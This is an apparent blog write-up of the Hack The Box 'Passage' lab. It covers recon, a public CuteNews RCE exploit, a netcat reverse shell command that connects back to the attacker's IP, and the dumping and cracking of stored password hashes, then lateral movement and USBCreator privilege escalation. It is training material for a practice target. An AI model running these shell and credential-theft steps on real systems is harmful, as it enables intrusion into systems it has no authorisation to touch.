# Passage ~ Hack The Box

* * *

### Prerequisite

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985581281/a3773839-4e8d-4a89-adf0-3d02c8f2fbe2.jpeg)

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

    echo "10.10.10.215	academy.htb" >> /etc/hosts

hosts file entry

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985582335/f9f45488-3134-4a00-8670-d3c857d8aea8.png)

Okay now onto the hacking!

* * *

### Reconnaissance

As always, I started off with an NMAP scan against the machine.

    ┌──(root💀kali)-[/home/…/boxes/htb/machines/passage]
    └─# nmap -Pn -sC -sV -oN initial passage.htb 

    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-11 18:36 EST
    Nmap scan report for passage.htb (10.10.10.206)
    Host is up (0.0056s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
    |   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
    |_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Passage News
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

### Scanning & Enumeration

Based on the scan that was run, I realized that port 80 was running a web server. This was the web app that was being served!

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985583457/a22e9d6d-30e6-48fc-b813-c1a1fd3b1241.png)

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985584550/0113deef-9e9a-4f27-b9a0-f9b1c56c1534.png)

There wasn't much on the page itself except that it was run by `CuteNews`. Thus, I decided to take a look at the source code.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985585494/072f1971-4d18-48a4-98dd-0e6acef3e404.png)

The source revealed a directory named `CuteNews`. Accessing that brought me to a login page.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985586487/05f31788-6803-441c-bf5d-0576d654dc88.png)

On top of the login page, I was also able to identify the version that the webapp was running.

A quick google search revealed that there was an [RCE exploit](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11447) available for this version of `CuteNews`. There was also a [POC](https://github.com/CRFSlick/CVE-2019-11447-POC) on github by [CRFSlick](https://github.com/CRFSlick).

### Exploitation

This exploit made use of a profile picture upload vulnerability which allowed users to run arbitrary code on the remote machine. The [python script](https://github.com/CRFSlick/CVE-2019-11447-POC.git) I used automated all these actions and gave a live remote shell.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985587549/0f8601a8-77b7-4688-9498-a9204efe1c3e.png)

Before running the exploit, I had to create an account on the website.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985588673/eda84c5a-92cc-4a5b-92fb-4a27f169f838.png)

Followed by that, I ran the exploit which gave me a reverse shell onto the box.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985589691/8e55dcb4-24c1-4695-b41a-7369cb205916.png)

Now, all that was left to do was to get a proper reverse shell onto my machine using `bash / nc`.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985590892/4bdfb32e-393b-4a65-a759-c2a78298d8d4.png)

    Remote Machine:
    $> nc -e /bin/bash 10.10.14.47 666
    
    Local Machine:
    ┌──(root💀kali)-[/home/…/boxes/htb/machines/passage]
    └─# nc -lvp 666

### Lateral Movement \[Level 1\]

After poking around for awhile, I noticed that `CuteNews` had hashes of user passwords stored in the `cdata/users` directory. I decided to explore this. I was also aware that there was a user named `paul` from the home directories.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985592100/53fb5018-3eaa-46c9-81ae-8d6d84a363c2.png)

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985593941/3059e3cd-3236-4726-b652-eac319c6ca80.png)

There was too many for me to go through. Thus, I concatenated all files together and removed everything that was not a hash.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985595010/a80890c7-5480-4a7d-9e03-d31e9050f03b.png)

This made it easier for me to decode the `base64` values. I made use of cyberchef to decode the values.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985596278/9fd1f29c-2d99-4d70-916e-cdd5ffe80c2e.png)

CyberChef

Next, I grepped the file for the word `paul` to get his credential hash.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985597522/4302c339-6ba7-4695-b625-74c6d50378fe.png)

After I got the hash, I turned to [CrackStation](https://crackstation.net/) to quickly get it cracked.

    e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985598941/e0416b1b-9db5-49dc-a035-077acc6a34e9.png)

After getting the password `atlanta1`, I was able to retrieve the user flag from paul's account~!

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985599916/df6ca41b-96ab-4a60-be1a-0a9b1c40e76b.png)

### Lateral Movement \[Level 2\]

Looking at the `.ssh` directory explains that `nadav@passage` had access to Paul's account.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985601046/bc26cb17-1347-49c4-b97e-1400bd625dbd.png)

Thus, I assumed that Paul would have the same access to the nadav's account and tried to ssh.

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985602254/b94802c7-1123-4748-af82-2df440b32857.png)

And....I was in `nadav`'s account!

### Privilege Escalation

As always, I busted out `Linpeas` which told me that the USBCreator on the machine was vulnerable and could be exploited!

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985603342/a54dfe91-fe1c-4e54-b573-0ce3983e6a88.png)

Couple google searches later, I found a [POC with explanation](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/) by PaloAlto Networks which I used to exploit this vulnerability!

![Passage ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985604467/d0ea30e7-3a40-4ce7-8e7e-b4f5bd342345.png)

ROOTY!
